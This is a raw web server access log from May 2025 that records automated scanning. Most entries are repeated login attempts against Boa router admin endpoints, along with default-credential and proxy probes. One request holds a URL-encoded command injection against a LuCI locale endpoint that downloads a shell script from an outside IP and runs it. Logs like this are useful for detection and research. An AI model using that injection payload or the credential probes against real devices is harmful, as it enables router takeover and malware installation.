45.134.225.133 - - [07/May/2025:03:09:11 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.107.12.18 - - [07/May/2025:03:10:05 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
45.134.225.133 - - [07/May/2025:03:10:06 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:03:10:35 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:03:11:25 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:03:12:48 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:03:13:37 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
95.214.54.4 - - [07/May/2025:03:14:01 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
161.248.238.13 - - [07/May/2025:03:14:12 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:03:14:16 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
161.248.238.13 - - [07/May/2025:03:14:21 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:03:14:43 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:03:15:06 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:03:16:10 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
161.248.238.13 - - [07/May/2025:03:16:23 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:03:16:31 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
161.248.238.13 - - [07/May/2025:03:16:52 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:03:17:02 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
185.218.84.178 - - [07/May/2025:03:18:26 +0530] "GET / HTTP/1.1" 200 1620 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.134.225.133 - - [07/May/2025:03:18:42 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
154.81.156.34 - - [07/May/2025:03:19:58 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
45.134.225.133 - - [07/May/2025:03:19:59 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
154.81.156.34 - - [07/May/2025:03:20:07 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
18.220.154.78 - - [07/May/2025:03:20:14 +0530] "\x16\x03\x01" 400 226 "-" "-"
45.134.225.133 - - [07/May/2025:03:21:00 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:03:21:15 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
95.214.54.4 - - [07/May/2025:03:21:32 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
45.134.225.133 - - [07/May/2025:03:21:40 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:03:22:33 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:03:22:45 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:03:23:52 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:03:24:08 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:03:24:26 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:03:25:28 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:03:25:55 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
18.220.154.78 - - [07/May/2025:03:26:10 +0530] "\x16\x03\x01" 400 226 "-" "-"
45.134.225.133 - - [07/May/2025:03:26:57 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:03:28:00 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:03:28:47 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:03:29:22 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:03:29:35 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:03:29:54 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:03:30:33 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
161.248.238.13 - - [07/May/2025:03:31:11 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:03:31:13 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
161.248.238.13 - - [07/May/2025:03:31:15 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:03:31:48 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:03:32:20 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:03:32:37 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:03:33:37 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:03:33:40 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:03:34:47 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
93.174.93.12 - - [07/May/2025:03:35:07 +0530] "GET / HTTP/1.0" 200 4270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
45.134.225.133 - - [07/May/2025:03:35:08 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
185.218.84.178 - - [07/May/2025:03:36:03 +0530] "GET / HTTP/1.1" 200 1620 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
161.248.238.13 - - [07/May/2025:03:36:07 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:03:36:47 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.107.12.18 - - [07/May/2025:03:36:53 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
45.134.225.133 - - [07/May/2025:03:36:54 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:03:36:59 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:03:38:02 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
161.248.238.13 - - [07/May/2025:03:38:48 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:03:39:39 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
95.214.54.4 - - [07/May/2025:03:40:01 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
212.107.12.18 - - [07/May/2025:03:40:59 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
45.134.225.133 - - [07/May/2025:03:42:13 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
95.214.54.4 - - [07/May/2025:03:42:58 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
45.134.225.133 - - [07/May/2025:03:43:04 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:03:43:18 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:03:43:54 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:03:44:15 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:03:44:19 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:03:45:26 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:03:46:54 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
91.236.116.61 - - [07/May/2025:03:47:21 +0530] "CONNECT google.com:443 HTTP/1.1" 200 4270 "-" "Go-http-client/1.1"
91.236.116.61 - - [07/May/2025:03:47:21 +0530] "\x16\x03\x01" 400 226 "-" "-"
45.134.225.133 - - [07/May/2025:03:47:45 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:03:48:20 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:03:48:28 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:03:48:57 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
154.81.156.34 - - [07/May/2025:03:48:59 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
154.81.156.34 - - [07/May/2025:03:49:30 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
45.134.225.133 - - [07/May/2025:03:49:40 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
161.248.238.13 - - [07/May/2025:03:50:51 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
95.214.54.4 - - [07/May/2025:03:50:54 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
45.95.147.209 - - [07/May/2025:03:50:54 +0530] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+sh%3B+wget+http%3A%2F%2F212.81.47.226%2Fsh%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+sh%60) HTTP/1.1" 404 224 "-" "Go-http-client/1.1"
45.134.225.133 - - [07/May/2025:03:51:32 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:03:51:58 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
161.248.238.13 - - [07/May/2025:03:52:07 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:03:53:28 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:03:54:16 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
117.209.4.142 - - [07/May/2025:03:55:39 +0530] "GET /boaform/admin/formLogin?username=adminisp&psd=adminisp HTTP/1.0" 404 221 "-" "-"
45.134.225.133 - - [07/May/2025:03:56:34 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:03:56:47 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:03:57:12 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:03:58:58 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:03:59:03 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
161.248.238.13 - - [07/May/2025:03:59:49 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:03:59:54 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
95.214.54.4 - - [07/May/2025:04:00:13 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
45.134.225.133 - - [07/May/2025:04:00:45 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:04:00:58 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:04:01:27 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:04:01:30 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:04:02:26 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
161.248.238.13 - - [07/May/2025:04:02:37 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:04:04:06 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:04:04:14 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:04:04:48 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:04:04:55 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
176.65.137.188 - - [07/May/2025:04:07:35 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
176.65.137.188 - - [07/May/2025:04:07:35 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "-" "Mozilla/5.0"
176.65.137.188 - - [07/May/2025:04:07:35 +0530] "POST /boaform/admin/formTracert HTTP/1.1" 404 223 "-" "Mozilla/5.0"
45.134.225.133 - - [07/May/2025:04:07:39 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:04:08:01 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.107.12.18 - - [07/May/2025:04:08:03 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
45.134.225.133 - - [07/May/2025:04:08:19 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:04:08:59 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
176.65.137.188 - - [07/May/2025:04:10:22 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
176.65.137.188 - - [07/May/2025:04:10:22 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "-" "Mozilla/5.0"
176.65.137.188 - - [07/May/2025:04:10:23 +0530] "POST /boaform/admin/formTracert HTTP/1.1" 404 223 "-" "Mozilla/5.0"
45.134.225.133 - - [07/May/2025:04:10:31 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:04:10:42 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:04:11:55 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:04:12:32 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
